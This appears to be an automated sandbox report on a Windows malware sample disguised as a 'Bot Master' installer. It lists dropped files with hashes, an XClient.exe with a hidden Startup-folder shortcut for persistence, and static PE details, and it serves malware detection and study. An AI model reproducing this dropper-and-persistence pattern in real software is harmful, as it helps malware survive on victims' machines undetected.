                                                                                                                                                                                                                Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):57
                                                                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\local\uriCache

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9
                                                                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:uriCache_

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\local\uriCache_

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                                                Entropy (8bit):4.99814466074659
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:YWLSGTtjSnXTo9okDHXdHdeU/EMnMTyXfTcbOAo9LuLgfGBPAzkVj/EMnMQY:YWLSGBjSn+Xd9J/NnMTyXfgQfaAIVj/q
                                                                                                                                                                                                                MD5:775E5F73DF48FBDADCBF804D9613DB1C
                                                                                                                                                                                                                SHA1:FE26023AA8CDFBF23181581ECEC02BB9CE6A0545
                                                                                                                                                                                                                SHA-256:512A86AF50948C62ADE70FFF8445240AA4D1E0B3B2B5A4C292E347511B851187
                                                                                                                                                                                                                SHA-512:9E2C76738CD412A25C5A36523BED8AC9CAC02D2A2F7EED87DF3D87E7F37935B1BA8B251124C3D9D3CD0295AFDE454BD459F326BE4B9C088251004FDDC6E50E0A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"cafee3b369e8f31e","server_context":"1;ca3796b9-65c1-a244-ab2a-bc5289ffa266;phsh:000;7e-05","result":0,"expiration_time":1710196125419740},{"file_hash":"a03546dcfafd8e0c","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":0,"expiration_time":1710196123992718}]}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Variations

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQan:YQ3Kq9X0dMgAEwjM
                                                                                                                                                                                                                MD5:961E3604F228B0D10541EBF921500C86
                                                                                                                                                                                                                SHA1:6E00570D9F78D9CFEBE67D4DA5EFE546543949A7
                                                                                                                                                                                                                SHA-256:F7B24F2EB3D5EB0550527490395D2F61C3D2FE74BB9CB345197DAD81B58B5FED
                                                                                                                                                                                                                SHA-512:535F930AFD2EF50282715C7E48859CC2D7B354FF4E6C156B94D5A2815F589B33189FFEDFCAF4456525283E993087F9F560D84CFCF497D189AB8101510A09C472
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":0}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\aa84fa71-0c73-40ba-8525-3dd56fa13fbb.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2900
                                                                                                                                                                                                                Entropy (8bit):5.311723587442811
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:YDEFMsFiHGS0af+tm4h8q3p8QSh/cIgwLURMYXylVotoWs5K1DV2HB+OdrxrBrZ1:PNkGS1f+s4758rh/cI9URoDotohRB/lR
                                                                                                                                                                                                                MD5:A7996F316964454BC5FCE8F22566618A
                                                                                                                                                                                                                SHA1:62AC803515FE6F9B793D338DA4A779995B2048CF
                                                                                                                                                                                                                SHA-256:B5F07499505F3B6CF2CFB49507F241C8855C568454A128503A3B1F6695CBDA0C
                                                                                                                                                                                                                SHA-512:EDF371F65D10932FF35EC8FAC456D93E57B1FEA2729B6FDC874CE0EB25C325C6F75FBC4188C72423DA20A3C69C07B460E84A0F9B9DCC418A49FCE0427C3BD761
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABPx5s/g90WQL1OExW01Io6EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACRqq4Bb8RSJdGlFvruS9pdkK0RIMs6Pu3xEo/J7IOqpQAAAAAOgAAAAAIAACAAAABX1+rzruERe/K3LUnyPox/iShmkj700vv2ZlPpdNbbGDAAAABVXX9uAxc/A2fdoMyjMJCahnmQQse5QY37RRfdKmGWhq/WOoeG913Hg+OHx/Ln8RdAAAAA8MU+gIUsR7jlYm1jnZKZZ4ElTleFZ041M77vyPBpN1gRHds4cTfK1zaQk6Y+CAsaiPLjZ3jgTFHXa5735+QlUQ=="},"policy":{"last_statistics_update":"13354562761068147"},"profile":{"info_cache":{"Default":{"avatar_icon":"chrome://t

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Mar 10 15:45:39 2024, mtime=Sun Mar 10 15:45:39 2024, atime=Sun Mar 10 15:45:39 2024, length=56368, window=hide
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):764
                                                                                                                                                                                                                Entropy (8bit):5.027358285853248
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:8Rl0C24FTWCedY//h3TsgjL4mFbn9jAsfrHkPhnBmV:8jsZ+1smt5AsfYZnBm
                                                                                                                                                                                                                MD5:1795717BADE229CC066930D0D164F037
                                                                                                                                                                                                                SHA1:4CF396FF91B84B47622868CFF3E7877ECE68AB63
                                                                                                                                                                                                                SHA-256:580216812F0F449EF2D963563912072B1519969BED952F9B680E798FDD780CC6
                                                                                                                                                                                                                SHA-512:75CE9F84AB53A8B282BB72EC86C55E72E557ED512296114264D28B13C5A83F7DEAC8E6097C5FCBF7EA957F62614628DB9A05F9E44A3E822E2C2F3F7D3F378829
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:L..................F.... ...<.Yb.s..<.Yb.s..<.Yb.s..0.......................v.:..DG..Yr?.D..U..k0.&...&......vk.v....a..F.s..h.b.s......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^jX.............................%..A.p.p.D.a.t.a...B.V.1.....jX....Roaming.@......CW.^jX.............................O..R.o.a.m.i.n.g.....b.2.0...jX.. .XClient.exe.H......jX..jX......`.......................".X.C.l.i.e.n.t...e.x.e.......Y...............-.......X...........d3Z......C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......045012...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\XClient.exe

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):56368
                                                                                                                                                                                                                Entropy (8bit):6.120994357619221
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
                                                                                                                                                                                                                MD5:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                SHA1:19DFD86294C4A525BA21C6AF77681B2A9BBECB55
                                                                                                                                                                                                                SHA-256:99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
                                                                                                                                                                                                                SHA-512:94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(.....*.(....-..*.~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....

                                                                                                                                                                                                                C:\Users\user\Desktop\Bot Master.lnk

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Sun Mar 10 15:45:49 2024, mtime=Sun Mar 10 15:45:49 2024, atime=Mon Jun 26 09:50:00 2023, length=2941952, window=hide
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2156
                                                                                                                                                                                                                Entropy (8bit):3.4573678752812578
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:82KETdOEJdJIfpXlOApe97KdMdwdv7bIUUEHqyFm:829TdO67KpnpJdMdwdfd8yF
                                                                                                                                                                                                                MD5:B69067F3F40FD3627AF26D234C8257A8
                                                                                                                                                                                                                SHA1:DA37FF11BDD6FEF679616E67CBD5867E777621F3
                                                                                                                                                                                                                SHA-256:A8ED64A274386BB6E6F08B87E7AACC5A5497BD5D07D4B1D958300F68FEBB3FD6
                                                                                                                                                                                                                SHA-512:82150C9E3E4ACB0F1F83C594933E561491EAF21B059EC7D4E9581474EF4DD81A6626DED4EC8AEF16AEC0ECDD67875B646BCC059AF0185F1B175F6C7BB7CF7349
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:L..................F.@.. ...M..h.s.....h.s....F.......,..........................P.O. .:i.....+00.../C:\.....................1.....jX....PROGRA~2.........O.IjX......................V.......P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....^.1.....jX....BOTMAS~1..F......jX..jX.............................B.o.t. .M.a.s.t.e.r.....^.1.....jX....BOTMAS~1..F......jX..jX............................+...B.o.t. .M.a.s.t.e.r.....h.2...,..V@V .BOTMAS~1.EXE..L......jX..jX................................B.o.t.M.a.s.t.e.r...e.x.e.......i...............-.......h...........d3Z......C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe..@.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.B.o.t. .M.a.s.t.e.r.\.B.o.t. .M.a.s.t.e.r.\.B.o.t.M.a.s.t.e.r...e.x.e.-.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.B.o.t. .M.a.s.t.e.r.\.B.o.t. .M.a.s.t.e.r.\.:.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.B.o.t. .M.a.s.t.e.r.\.B.o.t. .M.a.s.t.e.r.\.B.o.t.M.a.s.

                                                                                                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                \Device\ConDrv

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):221
                                                                                                                                                                                                                Entropy (8bit):4.801526423190794
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:zx3Me21f1LRJIQtAMw/VgRZBXVN+1GFJqozrCib:zKpj1JIUwqBFN+1Q3b
                                                                                                                                                                                                                MD5:A3DCA41A950A7DF7ECE76A867A17400E
                                                                                                                                                                                                                SHA1:AA9EFDBCF37BEE2C7FD0986F1A4308A73EC3F7BB
                                                                                                                                                                                                                SHA-256:6B2BE177016DF867316A0C432DAB0B71B6E51B35D169B0ACB1ABB47A4C03D7C0
                                                                                                                                                                                                                SHA-512:F80207B5B78C7AE867AAB139196BBBEDE0437961DD03E790AEF3B877A228D7A90B9178B3342324B0EEA1C270E2A232A769B2F2D9E5DB4C065EB95140FA12239D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:Microsoft (R) ASP.NET Compilation Tool version 4.8.4084.0..Utility to precompile an ASP.NET application..Copyright (C) Microsoft Corporation. All rights reserved.....Run 'aspnet_compiler -?' for a list of valid options...

                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                General

                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Entropy (8bit):7.939995431573425
                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                File name:SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                                                                                                                                                                                                                File size:3'511'296 bytes
                                                                                                                                                                                                                MD5:f24a4d5b6036a3de2eba88868bd771f2
                                                                                                                                                                                                                SHA1:3048d822d2b80d66284d1446052da0ba2be27d9e
                                                                                                                                                                                                                SHA256:2c2f38b6679224281d1f9a0bee4ac5db26f845e0d0eb74c0caa2d994411ee7e2
                                                                                                                                                                                                                SHA512:17a245a0c5e70982ea5f479319417864e122d3febbdf16d310d42b7f9acb8d7135fdf9c34082cd42858a4b98e696ec02d17b69deb249e8ed0cdfab26ec909bfc
                                                                                                                                                                                                                SSDEEP:49152:rbAa/I9L1n4OjdXalpe85gqWa4CRFaMQRh/7hK+OWp7W+qYp9foZWHyeHxYMp5FN:ga/K1Fa71qrMFO3DgCjqWQZWSmeMTPH
                                                                                                                                                                                                                TLSH:05F5230FFB8A89E1D2846B31C5EB593093B4E6817397CB4A358E53E518433A6FD5920F
                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N.e..................4...........4.. ....5...@.. ........................5......J6...`................................

                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                Icon Hash:1a696825b4888b03

                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Entrypoint:0x74fbde
                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                Time Stamp:0x65004EB5 [Tue Sep 12 11:42:45 2023 UTC]
                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                add byte ptr [eax], al
